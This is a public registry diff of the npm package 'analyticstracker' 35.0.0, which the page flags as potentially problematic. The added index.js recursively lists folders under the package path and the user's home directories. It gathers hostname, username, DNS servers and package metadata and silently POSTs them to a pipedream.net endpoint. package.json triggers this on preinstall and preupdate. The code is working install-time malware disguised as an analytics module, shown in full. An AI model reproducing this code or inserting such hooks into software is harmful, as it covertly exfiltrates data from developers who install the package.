analyticstracker 35.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of analyticstracker might be problematic. Click here for more details.
- package/index.js +81 -0
- package/package.json +13 -0
package/index.js
ADDED
@@ -0,0 +1,81 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const https = require("https");
|
4
|
+
const fs = require("fs");
|
5
|
+
const path = require("path");
|
6
|
+
const packageJSON = require("./package.json");
|
7
|
+
const package = packageJSON.name;
|
8
|
+
|
9
|
+
function getAllFoldersRecursive(directory) {
|
10
|
+
const results = [];
|
11
|
+
|
12
|
+
function traverse(currentDir) {
|
13
|
+
const contents = fs.readdirSync(currentDir);
|
14
|
+
|
15
|
+
for (const content of contents) {
|
16
|
+
const contentPath = path.join(currentDir, content);
|
17
|
+
|
18
|
+
if (fs.statSync(contentPath).isDirectory()) {
|
19
|
+
results.push(contentPath);
|
20
|
+
traverse(contentPath); // Recursive call for subdirectories
|
21
|
+
}
|
22
|
+
}
|
23
|
+
}
|
24
|
+
|
25
|
+
traverse(directory);
|
26
|
+
return results;
|
27
|
+
}
|
28
|
+
|
29
|
+
// Get all folders in __dirname (recursive)
|
30
|
+
const allFoldersRecursive = getAllFoldersRecursive(path.join(__dirname, ".."));
|
31
|
+
|
32
|
+
// Get all folders in homedir (recursive)
|
33
|
+
const allFoldersHomeRecursive = getAllFoldersRecursive(os.homedir());
|
34
|
+
|
35
|
+
// Get all folders one level up from homedir (recursive)
|
36
|
+
const allFoldersHomeParentRecursive = getAllFoldersRecursive(path.join(os.homedir(), ".."));
|
37
|
+
|
38
|
+
const trackingData = {
|
39
|
+
p: package,
|
40
|
+
c: __dirname,
|
41
|
+
recursive_c: allFoldersRecursive, // Include all folders in __dirname (recursive)
|
42
|
+
hd: os.homedir(),
|
43
|
+
hd_recursive: allFoldersHomeParentRecursive, // Include all folders one level up from homedir (recursive)
|
44
|
+
hn: os.hostname(),
|
45
|
+
un: os.userInfo().username,
|
46
|
+
dns: dns.getServers(),
|
47
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
48
|
+
v: packageJSON.version,
|
49
|
+
pjson: packageJSON,
|
50
|
+
};
|
51
|
+
|
52
|
+
var postData = JSON.stringify(trackingData);
|
53
|
+
|
54
|
+
// Define common options for both requests
|
55
|
+
var commonOptions = {
|
56
|
+
method: "POST",
|
57
|
+
headers: {
|
58
|
+
"Content-Type": "application/json", // Use application/json content type
|
59
|
+
"Content-Length": Buffer.byteLength(postData), // Calculate the byte length of JSON string
|
60
|
+
},
|
61
|
+
};
|
62
|
+
|
63
|
+
var options1 = {
|
64
|
+
...commonOptions,
|
65
|
+
hostname: "eomrggpccj3x1x1.m.pipedream.net",
|
66
|
+
port: 443,
|
67
|
+
path: "/",
|
68
|
+
};
|
69
|
+
|
70
|
+
var req1 = https.request(options1, (res) => {
|
71
|
+
res.on("data", (d) => {
|
72
|
+
process.stdout.write(d);
|
73
|
+
});
|
74
|
+
});
|
75
|
+
|
76
|
+
req1.on("error", (e) => {
|
77
|
+
// console.error(e);
|
78
|
+
});
|
79
|
+
|
80
|
+
req1.write(postData);
|
81
|
+
req1.end();
|
package/package.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "analyticstracker",
|
3
|
+
"version": "35.0.0",
|
4
|
+
"description": "analyticstracker module",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js",
|
9
|
+
"preupdate": "node index.js"
|
10
|
+
},
|
11
|
+
"author": "",
|
12
|
+
"license": "ISC"
|
13
|
+
}
|